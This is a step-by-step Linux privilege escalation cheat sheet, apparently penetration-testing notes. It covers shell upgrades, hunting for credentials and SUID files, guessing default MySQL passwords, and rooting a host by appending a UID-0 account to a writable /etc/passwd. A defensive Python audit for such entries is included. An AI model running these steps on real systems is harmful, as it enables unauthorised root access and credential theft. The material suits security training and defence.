Privilege Escalation
Based on g0tmilk’s Guide to Linux Privilege Escalation + additional field notes.
Step 1: Upgrade Your Shell
Make your shell more stable & interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
# Background and fix terminal
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200
Step 2: Enumeration – System Context
Capabilities & Tooling
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat
Compilation / System Info (arch & kernel)
file /bin/bash
uname -a
cat /etc/*-release
cat /etc/issue
Step 3: User Context
Are we a real user?
sudo -l
ls -lsaht /etc/sudoers
groups <user>
env
Users & homes:
cd /home/ && ls -lsaht
Step 4: Credentials & Configs
Check for web creds:
cd /var/www/html/ && ls -lsaht
Check /etc/ for unusual configs:
ls -lsaht /etc/
ls -lsaht /etc/ | grep -i '\.conf'
ls -lsaht /etc/ | grep -i '\.secret'
SSH keys:
ls -lsaR /home/
Other dirs of interest:
ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/
Step 5: Escalation Primitives
SUID / SGID
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
Check exploitation paths: GTFOBins
File Capabilities
getcap -r / 2>/dev/null
Reference: Linux File Capabilities
Step 6: Process & Cron Monitoring
Running Processes
ps aux | grep -i root --color=auto
Network
netstat -antup
netstat -tunlp
Cron Jobs
crontab -u root -l
cat /etc/crontab
ls /etc/cron.*
Process Monitoring (pspy)
# On the target: work from a writable dir, then transfer pspy64 here from the attacker machine
cd /var/tmp/
chmod 755 pspy64
./pspy64
Step 7: Databases
Check for MySQL root creds:
mysql -uroot -p
# Try common passwords:
# root, toor, (empty)
Step 8: File Transfers
Check what’s available:
which wget
which curl
which nc
which fetch
ls -lsaht /bin/ | grep -i 'ftp'
Step 9: NFS
Check for exports:
cat /etc/exports
👉 Look for no_root_squash
See also: Attacking NFS Shares
Step 10: Persistence / Living on Host
Writable locations:
/var/tmp/
/tmp/
/dev/shm/
Check mounts:
cat /etc/fstab
Step 11: Local Port Forwards
If vulnerable services are only listening on 127.0.0.1, use meterpreter port forwarding.
Step 12: Direct Root via /etc/passwd
If /etc/passwd is writable:
openssl passwd -1 'i<3hacking'   # quote the password: an unquoted < is a shell redirect
# Example output: $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
id
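Why the appended line works, and how to catch it: the second field of /etc/passwd normally holds "x" so that authentication falls through to /etc/shadow, but a hash placed there is honoured directly, and a UID of 0 makes the account root. The audit below is an added example, not part of g0tmilk's guide; it flags extra UID-0 accounts, hashes or empty passwords stored in passwd, and a world-writable file. The SAMPLE lines are constructed (they reuse the hash from the step above), and the rule names are my own labels.

```python
import os
import stat


def audit_passwd_lines(lines):
    """Return a list of (rule, account) findings for passwd-format lines."""
    findings = []
    for raw in lines:
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed", line))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            # A second UID-0 account is exactly what the echo >> /etc/passwd step creates
            findings.append(("extra-uid0", name))
        if pw == "":
            findings.append(("empty-password", name))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # Anything other than the shadow placeholder or a lock marker is a
            # hash kept in a world-readable file, bypassing /etc/shadow
            findings.append(("hash-in-passwd", name))
    return findings


def passwd_world_writable(path="/etc/passwd"):
    """True if others have write permission on the passwd file."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


# Constructed sample: a normal system plus the entry from the step above
SAMPLE = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "bob:x:1000:1000:Bob:/home/bob:/bin/bash",
    "siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash",
    "guest::1001:1001::/home/guest:/bin/sh",
]

if __name__ == "__main__":
    for rule, who in audit_passwd_lines(SAMPLE):
        print(f"{rule}: {who}")
    if os.path.exists("/etc/passwd"):
        print("world-writable:", passwd_world_writable())
```

Run it against the live file with `audit_passwd_lines(open("/etc/passwd"))`; any finding other than the usual lock markers is worth a look.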
Step 13: Miscellaneous
Mail:
ls -lsaht /var/mail/
ls -lsaht /var/spool/mail/
Files by specific user (ex: bob):
find / -user bob 2>/dev/null